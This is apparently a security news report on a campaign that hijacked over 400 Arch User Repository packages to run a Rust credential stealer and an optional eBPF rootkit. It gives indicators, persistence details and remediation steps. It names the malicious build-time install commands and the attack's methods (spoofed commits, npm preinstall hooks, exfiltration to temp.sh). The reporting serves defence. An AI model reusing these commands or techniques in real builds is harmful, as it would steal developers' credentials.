More than 400 packages in the Arch User Repository were quietly altered this week so that building them would run a Rust credential stealer — and, if it landed with root privileges, could load an optional eBPF rootkit designed to hide the infection.
How attackers abused the AUR trust model
Attackers adopted orphaned AUR packages, kept their names and histories intact, and edited build files (PKGBUILD or .install) to run malicious build-time commands. Rather than exploiting a software flaw or breaching Arch’s official systems, the campaign changed the recipe that builds community packages. Sonatype named the campaign "Atomic Arch" and community trackers found the attackers targeting abandoned projects that had been left open for adoption.
In many cases the malicious commits were made to appear legitimate: the attackers spoofed git commit metadata so changes looked as if they came from a long-standing maintainer — an account an Arch Linux Trusted User later confirmed had not been compromised. The official Arch repositories were not affected; this campaign targeted the separate, community-run AUR.
The Rust credential stealer and the optional eBPF rootkit
Independent researcher Whanos reverse-engineered the injected payload, a Rust binary named deps bundled inside an npm package. The stealer collects developer-oriented secrets: cookies, tokens and local storage from Chromium-based browsers; session data from Electron apps including Slack, Discord and Microsoft Teams; GitHub, npm and HashiCorp Vault tokens; OpenAI/ChatGPT bearer material and account metadata; SSH keys, known_hosts and shell histories; Docker and Podman credentials; and VPN profiles.
Stolen data is exfiltrated over HTTP to temp.sh, while command-and-control traffic is routed through a Tor onion service via a local loopback proxy. For persistence the binary installs a systemd service with Restart=always. When it runs as root it copies itself under /var/lib/ and writes a unit under /etc/systemd/system/; as a normal user it uses the home directory and a per-user unit under ~/.config/systemd/user/.
Early analyses overstated the role of the eBPF component: it is optional and only activates when the binary has root and the right capabilities — it is not used to escalate privileges. When loaded, the BPF code hides the malware’s processes, process names and socket inodes using pinned maps named hidden_pids, hidden_names and hidden_inodes, and prevents debugger attachments. Analysts also flagged a second staged file tied to monero-wallet-gui as a possible, unanalyzed cryptominer.
Scale, indicators, and a second wave
Sonatype’s first write-up identified more than 20 hijacked packages. Community trackers and a grep of the AUR git mirror quickly expanded that to roughly 408 packages, and consolidated lists continued to grow. Confirmed examples reported to the Arch mailing list include the alvr and premake-git packages.
The injected build step commonly ran npm install atomic-lockfile, pulling atomic-lockfile@1.4.2 (which contained a preinstall hook that executed the bundled deps ELF) alongside otherwise legitimate dependencies. The atomic-lockfile package showed only 134 weekly downloads on Socket before it was removed from the registry, indicating the primary exposure vector is AUR builds rather than npm installs.
A second wave used bun install js-digest, pushed from accounts linked by community trackers to the same npm publisher as atomic-lockfile; that payload is a different ELF, also flagged as malicious. The affected-package lists remain incomplete; Sonatype tracks the activity as Sonatype-2026-003775 with a CVSS score of 8.7, and no CVE has been assigned.
The main payload’s SHA-256 is 6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b; the full indicator set and the onion C2 host are published in the ioctl.fail analysis.
Immediate remediation and detection steps
- Check any AUR package installed or updated on or after June 11 against community-compiled affected-package lists and detection scripts. Grep recent build history and caches for npm install atomic-lockfile, bun install js-digest, and the payload path src/hooks/deps.
- If a flagged package ran, treat the host as credential-compromised. Rotate browser sessions, SSH keys, GitHub and npm tokens, Slack/Teams/Discord sessions, Vault tokens, Docker and Podman credentials, and any cloud keys the stealer could access.
- Hunt for persistence: look for unexpected systemd services (system units and ~/.config/systemd/user/), unexpected files under /var/lib/, and pinned BPF maps under /sys/fs/bpf named hidden_pids, hidden_names and hidden_inodes. Review outbound connections for Tor and uploads to services such as temp.sh.
- If the package ran as root, assume the eBPF rootkit may be present and reinstall the system from trusted media; a package manager cannot prove a system is clean after a rootkit-capable payload executed.
- Going forward, read PKGBUILD and .install hooks before building AUR packages, especially recently adopted or long-dormant projects that suddenly become active. If you do not understand the build instructions, do not install the package.
What this means for Arch maintainers, technologists, and end users
Arch maintainers are resetting malicious commits, banning the offending accounts and asking users to report suspect packages on the mailing list thread. Technologists and security teams will need to hunt systems for both the stealer’s indicators and persistence mechanisms and treat affected hosts as credential-compromised. End users — particularly developers and build-system operators — should scrutinize any AUR packages updated on or after June 11 and avoid building recently adopted packages without inspecting PKGBUILD and install hooks.
The campaign succeeded not by cracking code but by hijacking trust: attackers inherited trusted names and histories and changed the build instructions beneath them. The affected list is still incomplete, and the community response now hinges on cataloging every altered package and on operators treating build-time execution as a significant supply-chain risk. Read the original advisory and indicator set here: https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html